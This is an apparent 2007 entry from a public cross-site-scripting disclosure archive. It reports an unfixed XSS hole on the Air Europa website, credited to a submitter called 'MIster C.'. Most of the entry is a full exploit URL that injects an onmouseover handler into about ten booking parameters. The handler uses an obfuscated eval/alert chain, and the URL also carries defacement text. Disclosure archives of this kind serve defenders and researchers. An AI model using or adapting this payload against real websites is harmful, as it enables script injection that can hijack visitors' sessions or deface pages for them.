Security researcher MIster C., has submitted on 01/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.aireuropa.com, which at the time of submission ranked 42447 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/09/2007 |
Date published: 07/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: MIster C. |
Domain: www.aireuropa.com |
Category: XSS |
Pagerank: 42447 |
URL: http://www.aireuropa.com/web9/web9_web/1/reservas_v3/xreserva_v3_tmp.consulta_dispo_rt.html?xsid=%3C %2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B %3EMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_fecdep=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da% 3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+THIS+AR EA%3C%2Fcode%3E&p_fecarr=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b %28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_numpaxad l=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29% 29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_numpaxchd=%3C%2Ftextarea%3E%3Cb r%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIste r+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_numpaxinf=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover %3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+TH IS+AREA%3C%2Fcode%3E&p_auxaptdep=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert %3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_ auxaptarr=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.so urce%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_auxtipcab=%3C%2Ftextare a%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+ By+MIster+C.+MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&p_auxswiv=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmou seover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3EFucked+By+MIster+C.+MOVE+MOUSE+O VER+THIS+AREA%3C%2Fcode%3E |
Click here to view the mirror
|
|
|